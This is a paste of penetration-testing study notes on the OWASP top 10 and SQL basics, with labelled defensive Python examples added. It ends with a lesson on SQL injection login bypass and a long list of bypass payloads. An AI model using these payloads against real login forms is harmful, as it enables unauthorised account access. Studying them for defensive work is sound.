hello world!

a guest
Nov 2nd, 2018
VAPT
Vulnerability Assessment Penetration Testing
VAPT EXPERT = Vulnerability Assessment and Penetration Testing expert

So VULNERABILITY ASSESSMENT is a pre-hacking phase in which the intended person scans the target and tries to find the security gaps or holes that make the device or software vulnerable.

Example
ip address -> 192.168.1.55
open ports (ports on which some application may be listening)
filtered ports (firewall protected)
OS information - is it up to date?
services running on the ports


PENETRATION TESTING is a phase in which the intended person actually tests the systems by simulating attacks on them.

Penetration testing is a method of evaluating the security of a computer system or network by simulating an attack the way a malicious hacker would. The process involves an active analysis of the system for any weaknesses, technical flaws or vulnerabilities. This analysis is carried out from the position of a potential attacker, and involves active exploitation of security vulnerabilities.

Example: using exploits for a known vulnerability

-> Windows 7 server

-> using an exploit to exploit the server

At the end a proof of concept needs to be made and handed to the senior authority.

Example
Big banks or smart car manufacturers hire security professionals to hack into their systems ethically and pay them large sums of money to do that. At the end of the VAPT, a VAPT report needs to be handed to the bank's security team.


__________________________________________________



OWASP -> Open Web Application Security Project

OWASP top 10

1. Injection
2. Broken Authentication and Session Management
3. Cross Site Scripting (XSS)
4. Insecure Direct Object Reference
5. Security Misconfiguration
6. Sensitive Data Exposure
7. Missing Function Level Access Control
8. Cross Site Request Forgery
9. Using Known Vulnerable Components
10. Unvalidated Redirects and Forwards



1. Injection Vulnerabilities --> SQL, commands

An injection attack occurs only if hackers are able to send malicious, unintended data from an application to the interpreter, or say the backend of the website.

application -> untrusted data -> interpreter (backend)

Why this attack occurs ->>
This attack occurs because of improper validation. For example, take the sign-in or sign-up field of a web application: when a user is trying to sign in or sign up,
it requires the user to enter the id/password in a certain manner, for instance there should be no special characters involved. You will learn about that as regular expressions.

Similarly, when a developer is setting up a web app or application he/she needs to validate all the parameters, links and domains of the website so that commands or special characters don't work.
__________________________________________________________________
2. Broken Authentication and Session Management

In broken authentication or session management, hackers attempt to steal accounts from other users. Attackers use leaks and flaws in the authentication or session management functions.

Why this attack occurs

-> User credentials are not protected with hashing or encryption when stored
-> Credentials can be guessed or overwritten through weak management functions, e.g. the hacker is able to guess the session id or change the password

-> Session ids are exposed in the URL
-> Session ids don't time out
-> Passwords, credentials and session ids are sent over in unencrypted form
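The five causes above map onto a few concrete defences. The following is an added example written for these notes (it is not code from the notes' author): credentials stored as salted PBKDF2 hashes rather than plaintext, a constant-time comparison on verification, session ids drawn from a cryptographic random source instead of anything guessable, and an idle timeout after which the session is thrown away. The iteration count, the 15-minute timeout and the in-memory `SessionStore` are assumptions chosen for the demo.

```python
import hashlib
import hmac
import os
import secrets
import time
from typing import Optional

# Constructed example (added here, not from the notes). Demo settings:
PBKDF2_ITERATIONS = 200_000          # assumed work factor; tune for your hardware
SESSION_TTL_SECONDS = 15 * 60        # sessions time out after 15 idle minutes (assumed)


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return 'salt$hash' in hex. A fresh random salt per user means two users
    with the same password get different stored values."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"{salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time, so the
    response time does not reveal how many bytes of the hash matched."""
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ITERATIONS
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)


class SessionStore:
    """In-memory session table: session id -> (username, last_seen).
    The clock is injectable so the timeout can be exercised in a test."""

    def __init__(self, now=time.time):
        self._now = now
        self._sessions = {}

    def create(self, username: str) -> str:
        session_id = secrets.token_urlsafe(32)   # 256 random bits, not a counter
        self._sessions[session_id] = (username, self._now())
        return session_id

    def lookup(self, session_id: str) -> Optional[str]:
        """Return the username for a live session, or None if unknown or expired."""
        entry = self._sessions.get(session_id)
        if entry is None:
            return None
        username, last_seen = entry
        if self._now() - last_seen > SESSION_TTL_SECONDS:
            del self._sessions[session_id]       # expired: a fresh login is required
            return None
        self._sessions[session_id] = (username, self._now())   # refresh idle timer
        return username


def login(users: dict, store: SessionStore, username: str, password: str) -> Optional[str]:
    """Return a new session id on success, None otherwise. Unknown user and
    wrong password give the same answer, so usernames cannot be enumerated."""
    stored = users.get(username)
    if stored is None or not verify_password(password, stored):
        return None
    return store.create(username)
```

The session id is meant to travel only in a cookie (with Secure and HttpOnly set), never in the URL, which covers the "exposed in the url" and "sent over in unencrypted form" bullets above.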
______________________________________________________________________

3. Cross Site Scripting (XSS)

It is an attack in which hackers are able to execute JavaScript code on a web site. It is of three types:

-> Reflected XSS

-> Stored XSS

-> DOM (Document Object Model) based XSS

This attack can be used by a hacker to execute JavaScript code in the victim's browser to hijack user sessions, deface the website, insert content, etc.

Why this attack occurs

-> Improper validation
-> Unsafe JavaScript APIs

Pentesting of a website can easily protect it from XSS attacks, and XSS can also be found with simple code analysis.
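Whether the attacker's string arrives reflected from a parameter, stored in the database, or through a DOM API, the defence at render time is the same: encode it for the context it is written into. The following is an added example, not code from the notes, showing three contexts with Python's standard library; the `render_*` function names and the sample inputs are constructed for the demo.

```python
import html
import json
import re

# Constructed example (added here, not from the notes): contextual output
# encoding when untrusted text is written into a page.

HTTP_URL = re.compile(r"^https?://", re.IGNORECASE)


def render_comment(author: str, body: str) -> str:
    """HTML body context: html.escape turns < > & " ' into entities, so a
    stored '<script>' is displayed as text instead of being executed."""
    return f"<p><b>{html.escape(author)}</b>: {html.escape(body)}</p>"


def render_profile_link(url: str, label: str) -> str:
    """Attribute context: only http(s) links are accepted (no javascript:),
    and quotes in the value are escaped so it cannot break out of href."""
    if not HTTP_URL.match(url):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(label)}</a>'


def render_inline_data(user_data: dict) -> str:
    """Script context: JSON-encode and additionally escape '<' so a value
    containing '</script>' cannot close the block and start its own."""
    payload = json.dumps(user_data).replace("<", "\\u003c")
    return f"<script>var user = {payload};</script>"
```

Note that `html.escape` alone is not enough for the href and script cases: an attribute needs the scheme check and a script block needs JSON encoding plus the `<` escape, which is why the three functions differ.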
_______________________________________________________________________________

4. Insecure Direct Object Reference


It is a vulnerability in which an attacker who is authorised to his/her own dashboard is able to gain access to some other user's account for

5. Security Misconfiguration

As the name is security misconfiguration, what it means is: imagine a web app having admin accounts on it, or just having default accounts with default passwords but with certain privileges. Now if you run a website which has default accounts configured and your website is available in the public domain, then from an attacker's perspective he/she can actually go out and try the default credentials and would be able to log in to the website.

Why this attack occurs ->
-> Keeping default credentials
-> Using a component or plugin which may have some default credentials
e.g.
Directory listing is not disabled on your server.
Attacker discovers she can simply list directories to find any file. Attacker finds and downloads all your compiled Java classes, which she decompiles and reverse engineers to get all your custom code. She then finds a serious access control flaw in your application.
_______________________________________________________________________

6. Sensitive Data Exposure
Sensitive data exposure is a vulnerability that occurs when a hacker is able to gain access to sensitive data in motion, at rest, or even in the customer's/user's browser.


e.g. 1
An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts this data automatically when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key.

e.g. 2
A site simply doesn't use SSL for all authenticated pages. An attacker simply monitors network traffic (like on an open wireless network) and steals the user's session cookie. The attacker then replays this cookie and hijacks the user's session, accessing the user's private data.


_____________________________________________________________________________
7. Missing Function Level Access Control
-> It is an attack in which a hacker or an anonymous person is able to access an application interface that they would otherwise never have been able to access.

e.g. www.anywebsite.com/user

and the hacker is able to access www.anywebsite.com/admin
Now if a hacker/person is able to do that, it is a flaw.
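Both item 4 (one user reaching another user's account) and item 7 (/user reaching /admin) are authorization failures, and both are fixed by the same habit: check on the server, on every request, not only that the caller is logged in but that this caller may do this thing to this object. The following is an added example, not code from the notes, with a constructed role policy for /user and /admin and two constructed accounts; `can_call`, `fetch_account`, `FUNCTION_ROLES` and `ACCOUNTS` are names chosen for the demo.

```python
from typing import Optional

# Constructed example (added here, not from the notes): server-side
# authorization for the two cases in the notes. Function level: /admin is
# reachable only by the admin role, not by anyone who is logged in.
# Object level: a user may read only the account he/she owns, even when
# guessing another account's id in the URL.

# which roles may call which interface (constructed sample policy)
FUNCTION_ROLES = {
    "/user": {"user", "admin"},
    "/admin": {"admin"},
}

# constructed sample data: account id -> owner and balance
ACCOUNTS = {
    10: {"owner": "deepak", "balance": 2600},
    4: {"owner": "gagan", "balance": 900},
}


def can_call(path: str, session_user: Optional[dict]) -> bool:
    """Function-level check: deny anonymous callers, unknown paths and wrong roles."""
    if session_user is None:
        return False
    allowed_roles = FUNCTION_ROLES.get(path)
    return allowed_roles is not None and session_user.get("role") in allowed_roles


def fetch_account(account_id: int, session_user: Optional[dict]) -> Optional[dict]:
    """Object-level check: look the record up by id, then verify ownership
    before returning it. 'Does not exist' and 'not yours' give the same
    answer (None), so account ids cannot be enumerated through the error."""
    if session_user is None:
        return None
    account = ACCOUNTS.get(account_id)
    if account is None:
        return None
    is_owner = account["owner"] == session_user.get("name")
    is_admin = session_user.get("role") == "admin"
    if not (is_owner or is_admin):
        return None
    return dict(account)   # return a copy so callers cannot mutate the store
```

The deny-by-default shape matters: an unknown path or a missing role falls through to "no", so adding a new admin page without updating the policy does not silently open it to everyone.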
____________________________________________________________
8. Cross Site Request Forgery
In this attack the hacker creates a forged HTTP request and tricks the victim into submitting that request via image tags or XSS.



The application allows a user to submit a state-changing request that does not include anything secret.
For example:
http://anywebsite.com/app/transferFunds?amount=1500&destinationAccount=4673243243
This is all done by making the victim click on a link or on a certain appealing image.
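The phrase "does not include anything secret" is the whole problem: the browser attaches the victim's cookie automatically, so the server must demand something a third-party page cannot supply. The following is an added example, not code from the notes, of the synchronizer-token pattern applied to the transferFunds request above; `CsrfGuard`, `handle_transfer`, the `csrf_token` field name and the in-memory balances are constructed for the demo.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed example (added here, not from the notes): a per-session
# anti-CSRF token. A forged request launched from another site cannot
# include it, so the state change is refused before any money moves.


class CsrfGuard:
    def __init__(self):
        self._tokens = {}   # session id -> token (assumed in-memory store)

    def token_for(self, session_id: str) -> str:
        """Return the session's token, minting a random one on first use.
        The server embeds this in its own forms as a hidden field."""
        token = self._tokens.get(session_id)
        if token is None:
            token = secrets.token_hex(32)
            self._tokens[session_id] = token
        return token

    def is_valid(self, session_id: str, submitted) -> bool:
        expected = self._tokens.get(session_id)
        if expected is None or submitted is None:
            return False
        return hmac.compare_digest(expected, submitted)   # constant-time compare


def handle_transfer(guard: CsrfGuard, session_id: str, method: str, body: str, balances: dict):
    """Process transferFunds. Returns (http_status, message).
    State changes are POST-only, so the GET link-in-an-image trick never
    reaches the money-moving code at all."""
    if method != "POST":
        return 405, "state change must be POST"
    fields = parse_qs(body)
    token = fields.get("csrf_token", [None])[0]
    if not guard.is_valid(session_id, token):
        return 403, "missing or invalid CSRF token"
    amount = int(fields["amount"][0])
    dest = fields["destinationAccount"][0]
    balances[dest] = balances.get(dest, 0) + amount
    return 200, f"transferred {amount} to {dest}"
```

A SameSite cookie attribute is a useful second layer, but the token check is what makes the request provably originate from a page the server itself served to that session.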
________________________________________________________________

9. Using Components with Known Vulnerabilities
In this case the hacker tries to discover a weak component through scanning or manual analysis and then either finds an exploit if one is already available or writes an exploit.

e.g.
a website using a server which has an RCE exploit
or
a WordPress website which has a vulnerable component for which an exploit exists.
___________________________________________________________________________________

10. Unvalidated Redirects and Forwards
The attacker links to an unvalidated redirect and tricks the victim into clicking it; the attacker targets unsafe forwards to bypass security checks.

e.g. http://anywebsite.com/redirect.jsp?url=evil.com

->-> url=evil.com <-<-
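The fix for redirect.jsp is to never send the browser to a host the application does not recognise. The following is an added example, not code from the notes, that validates the url parameter against an allow-list of the site's own hosts; it goes a little beyond the evil.com case above by also refusing scheme-relative forms (`//evil.com`, `///evil.com`), backslash variants, non-http schemes and userinfo tricks (`https://anywebsite.com@evil.com`). `ALLOWED_HOSTS`, `SAFE_DEFAULT` and `safe_redirect_target` are names and values assumed for the demo.

```python
from urllib.parse import urlparse

# Constructed example (added here, not from the notes): allow-list
# validation of a redirect target, falling back to a safe local default.

ALLOWED_HOSTS = {"anywebsite.com", "www.anywebsite.com"}   # assumed for the demo
SAFE_DEFAULT = "/"


def safe_redirect_target(url: str) -> str:
    """Return a redirect target that stays on our site, or SAFE_DEFAULT."""
    if not url:
        return SAFE_DEFAULT
    candidate = url.strip().replace("\\", "/")    # browsers treat \ like / in URLs
    if candidate.startswith("//"):
        # "//evil.com" and "///evil.com" are resolved by browsers to another host
        return SAFE_DEFAULT
    parsed = urlparse(candidate)
    if not parsed.scheme and not parsed.netloc:
        # plain relative path: stays on the current host
        return candidate if candidate.startswith("/") else "/" + candidate
    if parsed.scheme not in ("http", "https"):
        return SAFE_DEFAULT                       # javascript:, data:, file:, ...
    if parsed.username is not None or parsed.password is not None:
        return SAFE_DEFAULT                       # https://anywebsite.com@evil.com
    host = (parsed.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return SAFE_DEFAULT                       # also catches anywebsite.com.evil.com
    return candidate
```

Exact host matching (a set lookup, not `endswith` or a substring test) is deliberate: suffix checks are what let `anywebsite.com.evil.com` through.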
______________________________________________________________________________________
Introduction to DBMS
Database

A database is a collection of structured data sets which contains all the data (important credentials, logs, etc.).
Database Management System - this data needs to be managed, and that is done with the help of a DBMS. A DBMS can also interact with the user and write user data to the database.

Databases can be of two types
SQL
NoSQL
There are certain tables and entries in a database

table name Member
____________________________________________________________________
Name   | ID | NUMBER     | EMAIL              | ADDRESS     | Age |
____________________________________________________________________
deepak | 10 | 9123456719 | deepak@yahoo.co.in | lokhandvala | 26  |
Gagan  | 4  | 9145619237 | gagan@gmail.com    | Delhi       | 20  |
____________________________________________________________________


Structured queries would look like
for example
all the people who have age less than 30
so the query would look like

Select * from Member where age<30


h.w. perform all queries
queries
= SELECT - extracts data from a database
= UPDATE - updates data in a database
= DELETE - deletes data from a database
= INSERT INTO - inserts new data into a database
= CREATE DATABASE - creates a new database
= ALTER DATABASE - modifies a database
= CREATE TABLE - creates a new table
= ALTER TABLE - modifies a table
= DROP TABLE - deletes a table
= SELECT * from trainees - select everything from the table named "trainees"
= WHERE - selects which rows of the table are returned, by a condition on its columns
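For the homework, the following is an added example (not from the notes) that loads the Member table above into an in-memory SQLite database and runs the listed statement types against it. It uses bound parameters (the `?` placeholders) for every value rather than pasting values into the SQL text; the function names are chosen for the demo. CREATE DATABASE and ALTER DATABASE are not shown because SQLite creates the database with the connection itself.

```python
import sqlite3

# Constructed example (added here, not from the notes): the Member table
# from the notes in an in-memory SQLite database, with the homework
# statements run through bound parameters.


def build_member_table() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Member (Name TEXT, ID INTEGER PRIMARY KEY, "
        "NUMBER TEXT, EMAIL TEXT, ADDRESS TEXT, Age INTEGER)"
    )
    rows = [  # the two rows shown in the notes
        ("deepak", 10, "9123456719", "deepak@yahoo.co.in", "lokhandvala", 26),
        ("Gagan", 4, "9145619237", "gagan@gmail.com", "Delhi", 20),
    ]
    conn.executemany("INSERT INTO Member VALUES (?, ?, ?, ?, ?, ?)", rows)
    conn.commit()
    return conn


def names_younger_than(conn: sqlite3.Connection, age: int) -> list:
    """The query from the notes (Select * from Member where age<30), projected
    to names and ordered by ID so the result is deterministic."""
    cur = conn.execute("SELECT Name FROM Member WHERE Age < ? ORDER BY ID", (age,))
    return [row[0] for row in cur]


def update_address(conn: sqlite3.Connection, member_id: int, address: str) -> int:
    """UPDATE; returns how many rows changed (0 means there is no such ID)."""
    cur = conn.execute("UPDATE Member SET ADDRESS = ? WHERE ID = ?", (address, member_id))
    return cur.rowcount


def delete_member(conn: sqlite3.Connection, member_id: int) -> int:
    """DELETE; returns how many rows were removed."""
    return conn.execute("DELETE FROM Member WHERE ID = ?", (member_id,)).rowcount


def add_joined_column(conn: sqlite3.Connection) -> list:
    """ALTER TABLE, then read the column names back from the schema."""
    conn.execute("ALTER TABLE Member ADD COLUMN Joined TEXT")
    return [row[1] for row in conn.execute("PRAGMA table_info(Member)")]


def drop_member_table(conn: sqlite3.Connection) -> bool:
    """DROP TABLE; returns True once the table is gone from sqlite_master."""
    conn.execute("DROP TABLE Member")
    cur = conn.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='Member'")
    return cur.fetchone() is None
```

The `rowcount` returned by UPDATE and DELETE is worth checking in application code: a zero tells you the WHERE matched nothing, which is usually a bug or an attempt to touch an ID that does not exist.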

H.w. Study MongoDB
SQL vs NoSQL

_________________________________
LVS Setup Configuration Practical
_________________________________

______________________________________________
SQL Injection Authentication Bypass

What is happening at the time of authentication?
Let's imagine
there will be some query -> username == 'Something' && password == 'Something'

If we somehow make the query come out true and the DBMS gets confused, will it give us the login??

for e.g. username = 1' or '1' = '1
password = 1' or '1' = '1

or what else can we try
0' or '0' = '0
2' or '2' = '2
or
0' or '3' = '3

So basically you just need to manage to make the query true, and if there is improper validation you can get access.
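The "improper validation" named here and in the injection section earlier is really the query being assembled from the user's text. The following is an added example, not code from the notes, that builds the login query both ways over a constructed in-memory SQLite table: `vulnerable_login` splices the fields into the SQL string, so the `1' or '1' = '1` input from the notes makes the WHERE clause always true, while `safe_login` passes them as bound parameters and the same input is just a username nobody has. The `users` table, its single plaintext row and the function names are assumptions for the demo.

```python
import sqlite3

# Constructed example (added here, not from the notes): the same login
# check written with string splicing and with bound parameters.


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # plaintext only to keep the demo small; real systems store a salted hash
    conn.execute("INSERT INTO users VALUES ('hello', 'hello1')")
    conn.commit()
    return conn


def rendered_query(username: str, password: str) -> str:
    """The SQL text the vulnerable version actually sends to the DBMS."""
    return f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """User input becomes part of the SQL grammar: a quote in the input ends
    the string literal and the rest is parsed as SQL."""
    return conn.execute(rendered_query(username, password)).fetchone() is not None


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """User input is bound as data: the driver never lets it touch the SQL
    grammar, so quotes and OR clauses are compared literally."""
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None
```

Input validation (rejecting quotes, as the injection section suggests) reduces exposure but is not the control to rely on; parameter binding removes the problem regardless of what the input contains.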

username = hello
password = hello1

login


1' or '1' = '1
1' or '1' = '1

somewhere in the query there is ... WHERE username='1' or '1' = '1' AND password='1' or '1' = '1' ...


___________________________________________
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055